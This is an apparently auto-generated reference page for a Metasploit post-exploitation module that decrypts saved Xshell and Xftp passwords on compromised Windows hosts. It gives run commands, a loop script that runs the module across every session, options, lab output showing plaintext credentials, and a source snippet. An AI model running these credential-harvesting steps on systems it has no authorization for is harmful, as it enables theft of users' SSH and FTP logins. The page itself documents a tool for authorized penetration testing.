Windows Gather Xshell and Xftp Passwords - Metasploit


This page contains detailed information about how to use the post/windows/gather/credentials/xshell_xftp_password metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Windows Gather Xshell and Xftp Passwords
Module: post/windows/gather/credentials/xshell_xftp_password
Source code: modules/post/windows/gather/credentials/xshell_xftp_password.rb
Disclosure date: -
Last modification time: 2021-10-06 13:43:31 +0000
Supported architecture(s): -
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: -

This module can decrypt the password of xshell and xftp, if the user chooses to remember the password.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


There are two ways to execute this post module.

From the Meterpreter prompt

The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:

meterpreter > run post/windows/gather/credentials/xshell_xftp_password

From the msf prompt

The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.

msf > use post/windows/gather/credentials/xshell_xftp_password
msf post(xshell_xftp_password) > show options
    ... show and set options ...
msf post(xshell_xftp_password) > set SESSION session-id
msf post(xshell_xftp_password) > exploit

If you wish to run the post against all sessions from framework, here is how:

1 - Create the following resource script:


framework.sessions.each_pair do |sid, session|
  run_single("use post/windows/gather/credentials/xshell_xftp_password")
  run_single("set SESSION #{sid}")
  run_single("run")
end

2 - At the msf prompt, execute the above resource script:

msf > resource path-to-resource-script

Required Options


  • SESSION: The session to run this module on.

Knowledge Base


Vulnerable Application


This module can decrypt the password of xshell and xftp, If the user chooses to remember the password.

Analysis of encryption algorithm here.

You can find its official website here.

Verification Steps


  1. Download the latest installer of Xshell or Xftp.
  2. Use xshell to log in to ssh or xftp to log in to ftp.
  3. Remember to save the account password.
  4. Get a meterpreter session on a Windows host.
  5. Do: run post/windows/gather/credentials/xshell_xftp_password
  6. If the session file is saved in the system, the host, port, user name and plaintext password will be printed.

Options


MASTER_PASSWORD

  • Specify user's master password, e.g.:123456'

Scenarios


meterpreter > run post/windows/gather/credentials/xshell_xftp_password 

[*] Gather Xshell and Xftp Passwords on WIN-A18RNMNL9C2
[-] Unexpected Windows error 1332
[*] Search session files on C:\Users\Administrator\Documents\NetSarang
[*] Search session files on C:\Users\Administrator\Documents\NetSarang Computer\6
[-] Invalid MASTER_PASSWORD, Decryption failed!
Xshell and Xftp Password
========================

Type         Name              Host            Port  UserName  Plaintext  Password
----         ----              ----            ----  --------  ---------  --------
Xftp_V5.3    session.xfp      192.168.76.1    2121  lftpd     lftpd      yhmb27u7ThR1+BNb5T+/aaps3NvoY3zmr7pVLjWIgfdsyVeHMA==
Xftp_V5.3    session.xfp      192.168.76.1    2121  lftpd                sQsnGxC7ThR1+BNb5T+/aaps3NvoY3zmr7pVLjWIgfdsyVeHMA==
Xshell_V5.3  session.xsh      192.168.76.134  22    kt        123456     l03cn+pMjZae727K08KaOmKSgOaGzww/XVqGr/PKEgIMkjrcbJI=
Xshell_V6.0  session.xsh                      22    kt                   

[+] Passwords stored in: /home/kali-team/.msf4/loot/20200610071906_default_192.168.76.132_host.xshell_xftp_138987.txt
meterpreter > 
  • Specify MASTER_PASSWORD
meterpreter > run post/windows/gather/credentials/xshell_xftp_password MASTER_PASSWORD=123456

[*] Gather Xshell and Xftp Passwords on WIN-A18RNMNL9C2
[-] Unexpected Windows error 1332
[*] Search session files on C:\Users\Administrator\Documents\NetSarang
[*] Search session files on C:\Users\Administrator\Documents\NetSarang Computer\6
Xshell and Xftp Password
========================

Type         Name              Host            Port  UserName  Plaintext  Password
----         ----              ----            ----  --------  ---------  --------
Xftp_V5.3    session.xfp      192.168.76.1    2121  lftpd     lftpd      yhmb27u7ThR1+BNb5T+/aaps3NvoY3zmr7pVLjWIgfdsyVeHMA==
Xftp_V5.3    session.xfp      192.168.76.1    2121  lftpd     lftpd      sQsnGxC7ThR1+BNb5T+/aaps3NvoY3zmr7pVLjWIgfdsyVeHMA==
Xshell_V5.3  session.xsh      192.168.76.134  22    kt        123456     l03cn+pMjZae727K08KaOmKSgOaGzww/XVqGr/PKEgIMkjrcbJI=
Xshell_V6.0  session.xsh                      22    kt                   

[+] Passwords stored in: /home/kali-team/.msf4/loot/20200610072134_default_192.168.76.132_host.xshell_xftp_307846.txt
meterpreter > 

Go back to menu.

Msfconsole Usage


Here is how the windows/gather/credentials/xshell_xftp_password post exploitation module looks in the msfconsole:

msf6 > use post/windows/gather/credentials/xshell_xftp_password

msf6 post(windows/gather/credentials/xshell_xftp_password) > show info

       Name: Windows Gather Xshell and Xftp Passwords
     Module: post/windows/gather/credentials/xshell_xftp_password
   Platform: Windows
       Arch: 
       Rank: Normal

Provided by:
  Kali-Team <[email protected]>

Compatible session types:
  Meterpreter

Basic options:
  Name             Current Setting  Required  Description
  ----             ---------------  --------  -----------
  MASTER_PASSWORD                   no        If the user sets the master password, e.g.:123456
  SESSION                           yes       The session to run this module on.

Description:
  This module can decrypt the password of xshell and xftp, if the user 
  chooses to remember the password.

References:
  https://github.com/HyperSine/how-does-Xmanager-encrypt-password/blob/master/doc/how-does-Xmanager-encrypt-password.md

Module Options


This is a complete list of options available in the windows/gather/credentials/xshell_xftp_password post exploitation module:

msf6 post(windows/gather/credentials/xshell_xftp_password) > show options

Module options (post/windows/gather/credentials/xshell_xftp_password):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   MASTER_PASSWORD                   no        If the user sets the master password, e.g.:123456
   SESSION                           yes       The session to run this module on.

Advanced Options


Here is a complete list of advanced options supported by the windows/gather/credentials/xshell_xftp_password post exploitation module:

msf6 post(windows/gather/credentials/xshell_xftp_password) > show advanced

Module advanced options (post/windows/gather/credentials/xshell_xftp_password):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   VERBOSE    false            no        Enable detailed status messages
   WORKSPACE                   no        Specify the workspace for this module

Post Actions


This is a list of all post exploitation actions which the windows/gather/credentials/xshell_xftp_password module can do:

msf6 post(windows/gather/credentials/xshell_xftp_password) > show actions

Post actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the windows/gather/credentials/xshell_xftp_password post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 post(windows/gather/credentials/xshell_xftp_password) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Invalid MASTER_PASSWORD, Decryption failed!


Here is a relevant code snippet related to the "Invalid MASTER_PASSWORD, Decryption failed!" error message:

121:	        net_sarang = NetSarangCrypto.new(session_type, version, user_profiles['UserName'], user_profiles['SID'], datastore['MASTER_PASSWORD'])
122:	      else
123:	        net_sarang = NetSarangCrypto.new(session_type, version, user_profiles['UserName'], user_profiles['SID'])
124:	      end
125:	      plaintext = net_sarang.decrypt_string(password) if password
126:	      print_error('Invalid MASTER_PASSWORD, Decryption failed!') if !plaintext && password
127:	      tbl << {
128:	        version: "#{session_type}_V" + version.to_s,
129:	        file_name: item['name'],
130:	        host: host,
131:	        port: port,

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • Kali-Team <kali-team[at]qq.com>

Version


This page has been produced using Metasploit Framework version 6.2.29-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.